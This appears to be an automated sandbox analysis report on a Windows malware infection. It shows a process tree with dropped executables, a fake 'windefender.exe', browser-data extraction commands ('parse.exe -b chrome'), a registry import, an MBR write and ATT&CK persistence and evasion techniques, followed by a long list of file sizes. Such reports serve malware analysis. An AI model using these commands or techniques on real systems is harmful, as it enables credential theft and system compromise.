C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4452 /prefetch:112⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4524 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4268 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2604 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2976 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:812⤵
-
-
-
-
-
-
C:\Windows\regedit.exeregedit /s chrome-set.reg8⤵
- Runs .reg file with regedit
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b firefox8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b chrome8⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b edge8⤵
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2wlygacj.ihe\ra4vpn.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\2wlygacj.ihe\ra4vpn.exeC:\Users\Admin\AppData\Local\Temp\2wlygacj.ihe\ra4vpn.exe6⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\9F3F.exeC:\Users\Admin\AppData\Local\Temp\9F3F.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\system32\taskeng.exetaskeng.exe {9F6AC8E0-7F6E-41FA-8996-9513CB337405} S-1-5-21-3825035466-2522850611-591511364-1000:EIDQHRRL\Admin:Interactive:[1]1⤵
-
C:\Users\Admin\AppData\Roaming\avueusjC:\Users\Admin\AppData\Roaming\avueusj2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Local\f67e0f07-41c7-433d-9e27-e31400b32aef\992.exeC:\Users\Admin\AppData\Local\f67e0f07-41c7-433d-9e27-e31400b32aef\992.exe --Task2⤵
-
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\9560.tmp.exeC:\Users\Admin\AppData\Local\Temp\9560.tmp.exe1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\98EA.tmp.exeC:\Users\Admin\AppData\Local\Temp\98EA.tmp.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 9242⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\A3E3.tmp.exeC:\Users\Admin\AppData\Local\Temp\A3E3.tmp.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\B014.tmp.exeC:\Users\Admin\AppData\Local\Temp\B014.tmp.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\BBB9.exeC:\Users\Admin\AppData\Local\Temp\BBB9.exe1⤵
- Drops startup file
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Users\Admin\AppData\Local\Temp\C876.tmp.exeC:\Users\Admin\AppData\Local\Temp\C876.tmp.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\CFC7.exeC:\Users\Admin\AppData\Local\Temp\CFC7.exe1⤵
- Writes to the Master Boot Record (MBR)
-
C:\Users\Admin\AppData\Local\Temp\D8DD.tmp.exeC:\Users\Admin\AppData\Local\Temp\D8DD.tmp.exe1⤵
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\E27F.tmp.exeC:\Users\Admin\AppData\Local\Temp\E27F.tmp.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\EF4C.tmp.exeC:\Users\Admin\AppData\Local\Temp\EF4C.tmp.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
Network
MITRE ATT&CK Enterprise v6
Persistence
Bootkit
1Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
2Scheduled Task
1Defense Evasion
Disabling Security Tools
2File and Directory Permissions Modification
1Impair Defenses
2Install Root Certificate
1Modify Registry
6Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
124KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
1.6MB
-
Filesize
8.1MB
-
Filesize
8.0MB
-
Filesize
8.1MB
-
Filesize
68KB
-
Filesize
2.5MB
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
68KB
-
Filesize
40KB
-
Filesize
40KB
-
Filesize
3.2MB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
584KB
-
Filesize
576KB
-
Filesize
200KB
-
Filesize
68KB
-
Filesize
3.2MB
-
Filesize
4.7MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
44KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
124KB
-
Filesize
88KB
-
Filesize
88KB
-
Filesize
88KB
-
Filesize
92KB
-
Filesize
560KB
-
Filesize
548KB
-
Filesize
68KB
-
Filesize
16KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
84KB
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
48KB
-
Filesize
4.7MB
-
Filesize
4.0MB
-
Filesize
68KB
-
Filesize
200KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
204KB
-
Filesize
9.9MB
-
Filesize
348KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
8KB
-
Filesize
592KB
-
Filesize
584KB
-
Filesize
68KB
-
Filesize
4KB
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
208KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
52KB
-
Filesize
296KB
-
Filesize
76KB
-
Filesize
68KB
-
Filesize
84KB
-
Filesize
1.6MB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
4KB
-
Filesize
560KB
-
Filesize
560KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
276KB
-
Filesize
40KB
-
Filesize
292KB
-
Filesize
292KB
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
4KB
-
Filesize
176KB
-
Filesize
68KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
252KB
-
Filesize
8KB
-
Filesize
240KB
-
Filesize
172KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
44KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
84KB
-
Filesize
68KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
40KB
-
Filesize
68KB
-
Filesize
40KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
1.2MB
-
Filesize
68KB
-
Filesize
52KB
-
Filesize
1.1MB
-
Filesize
1.2MB
-
Filesize
68KB
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
68KB
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
584KB
-
Filesize
592KB
-
Filesize
6.7MB
-
Filesize
1.9MB
-
Filesize
8.1MB
-
Filesize
14.9MB
-
Filesize
14.9MB
-
Filesize
14.9MB
-
Filesize
8.1MB
-
Filesize
14.9MB
-
Filesize
14.9MB
-
Filesize
14.9MB
-
Filesize
4.0MB
-
Filesize
68KB
-
Filesize
204KB
-
Filesize
212KB
-
Filesize
68KB
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
176B
-
Filesize
8.1MB
-
Filesize
1.0MB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
632KB
-
Filesize
4.6MB
-
Filesize
544KB
-
Filesize
4.5MB
-
Filesize
6.9MB
-
Filesize
412KB
-
Filesize
4.4MB
-
Filesize
212KB
-
Filesize
224KB
-
Filesize
4KB
-
Filesize
164KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
156KB
-
Filesize
4.8MB
-
Filesize
8KB
-
Filesize
876KB
-
Filesize
716KB
-
Filesize
4.7MB
-
Filesize
644KB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
432KB
-
Filesize
68KB
-
Filesize
428KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
444KB
-
Filesize
428KB
-
Filesize
68KB
-
Filesize
8.1MB
-
Filesize
14.9MB
-
Filesize
14.9MB
-
Filesize
14.9MB